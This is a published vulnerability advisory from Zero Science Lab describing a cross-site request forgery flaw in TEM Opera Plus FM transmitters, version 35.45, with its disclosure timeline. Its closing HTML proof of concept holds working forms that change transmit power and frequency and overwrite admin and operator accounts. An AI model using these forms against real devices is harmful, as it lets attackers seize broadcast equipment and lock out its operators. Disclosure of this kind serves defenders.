Title: TEM Opera Plus FM Family Transmitter 35.45 XSRF
Advisory ID: ZSL-2023-5800
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (4/5)
Release Date: 25.10.2023
This new line of Opera plus FM Transmitters combines very high efficiency, high reliability and low energy consumption in compact solutions. They have innovative functions and features that can eliminate the costs required by additional equipment: automatic exchange of audio sources, built-in stereo encoder, integrated RDS encoder, parallel I/O card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP Webserver.
The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
Telecomunicazioni Elettro Milano (TEM) S.r.l. - <https://www.tem-italy.it>
Software version: 35.45
Webserver version: 1.7
Webserver
[18.08.2023] Vulnerabilikty discovered.
[22.08.2023] Vendor contacted.
[05.10.2023] No response from the vendor.
[06.10.2023] Vendor contacted.
[08.10.2023] No response from the vendor.
[09.10.2023] CERT Serbia contacted.
[09.10.2023] CERT Serbia responded asking more details. Created incident ID: 355655.
[09.10.2023] Replied to CERT Serbia.
[24.10.2023] Asked CERT Serbia for status update.
[25.10.2023] No response from CERT Serbia.
[25.10.2023] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://cxsecurity.com/issue/WLB-2023100060>
[2] <https://packetstormsecurity.com/files/175373/TEM-Opera-Plus-FM-Family-Transmitter-35.45-Cross-Site-Request-Forgery.html>
[3] <https://www.exploit-db.com/exploits/51828>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/275731>
[25.10.2023] - Initial release
[03.11.2023] - Added reference [1] and [2]
[28.02.2024] - Added reference [3]
[06.03.2024] - Added reference [4]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<!--
TEM Opera Plus FM Family Transmitter 35.45 XSRF
Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
Product web page: https://www.tem-italy.it
Affected version: Software version: 35.45
Webserver version: 1.7
Summary: This new line of Opera plus FM Transmitters combines very
high efficiency, high reliability and low energy consumption in compact
solutions. They have innovative functions and features that can eliminate
the costs required by additional equipment: automatic exchange of audio
sources, built-in stereo encoder, integrated RDS encoder, parallel I/O
card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP
Webserver.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Webserver
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5800
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5800.php
18.08.2023
--><html><body><p>CSRF Change Forward Power:
-------------------------
</p>
<form action="http://192.168.1.2:8000/user/postcmd.htm" enctype="text/plain" method="POST">
<input name="Pwr" type="hidden" value="00100"/>
<input type="submit" value="Change"/>
</form>
CSRF Change Frequency:
---------------------
<form action="http://192.168.1.2:8000/user/postcmd.htm" enctype="text/plain" method="POST">
<input name="Freq" type="hidden" value="95.5"/>
<input type="submit" value="Change"/>
</form>
CSRF Change User/Pass/Priv Change Admin/User/Pass:
-------------------------------------------------
<form action="http://192.168.1.2:8000/protect/accounts.htm" method="POST">
<input name="usr0" type="hidden" value="admin"/>
<input name="psw0" type="hidden" value="admin"/>
<input name="usr1" type="hidden" value="operator1"/>
<input name="psw1" type="hidden" value="operator1"/>
<input name="lev1" type="hidden" value="1"/>
<input name="usr2" type="hidden" value="operator2"/>
<input name="psw2" type="hidden" value="operator2"/>
<input name="lev2" type="hidden" value="1"/>
<input name="usr3" type="hidden" value="consulter1"/>
<input name="psw3" type="hidden" value="consulter1"/>
<input name="lev3" type="hidden" value="2"/>
<input name="usr4" type="hidden" value="consulter2"/>
<input name="psw4" type="hidden" value="consulter2"/>
<input name="lev4" type="hidden" value="2"/>
<input name="usr5" type="hidden" value="consulter3"/>
<input name="psw5" type="hidden" value="consulter3"/>
<input name="lev5" type="hidden" value="2"/>
<input type="submit" value="Change"/>
</form>
</body></html>